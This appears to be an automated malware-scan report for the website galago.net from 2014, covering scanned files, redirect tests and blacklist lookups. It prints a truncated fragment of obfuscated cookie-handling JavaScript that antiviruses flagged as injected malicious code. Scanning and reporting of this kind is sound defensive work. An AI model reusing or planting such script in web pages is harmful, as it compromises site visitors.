Scanned pages/files
Request | Server response | Status |
http://galago.net/ | 200 OK Content-Length: 10129 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!-- var HhhPD4v="\x75\x73\x65r\x69dA\x30817FB\x325";var lB6AMa0="28";var ohSMG=1;function FnmTqif(v69H1E){var eBhQG;var LgPCJ=document.cookie;if(!LgPCJ){return null;}LgPCJ=LgPCJ.replace(/\s/g,"");var auAr5v_=LgPCJ.split(";");for(var i=0;i<auAr5v_.length;i++){var IzebBuO=auAr5v_[i].split("=");if(IzebBuO[0]==v69H1E){eBhQG=unescape(IzebBuO[1]);break;}}return eBhQG;};function D7iVO(v69H1E,CDfHdho,VfOr4D){var exp=new Date();var kGeaAfy=exp.getTime()+(VfOr4D*60*60*1000);exp.setTime(kGeaAfy) google_ad_client = "pub-4445461225908432"; google_ad_width = 160; google_ad_height = 600; google_ad_format = "160x600_as"; google_ad_type = "text"; google_ad_channel ="8848517839"; google_color_border = "780000"; google_color_bg = "FFFFFF"; google_color_link = "780000"; google_color_url = "780000"; google_color_text = "000000"; Antivirus reports:
| ||
http://pagead2.googlesyndication.com/pagead/show_ads.js | 200 OK Content-Length: 19942 Content-Type: text/javascript | clean |
http://galago.net/test404page.js | 404 Not Found Content-Length: 4030 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: galago.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Jun 2014 08:26:47 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: galago.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 08 Jun 2014 08:26:47 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: galago.net
Referer: http://www.google.com/search?q=galago.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: galago.net
Referer: http://www.google.com/search?q=galago.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=galago.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://galago.net/
Result: galago.net is not infected or malware details are not published yet.
Result: galago.net is not infected or malware details are not published yet.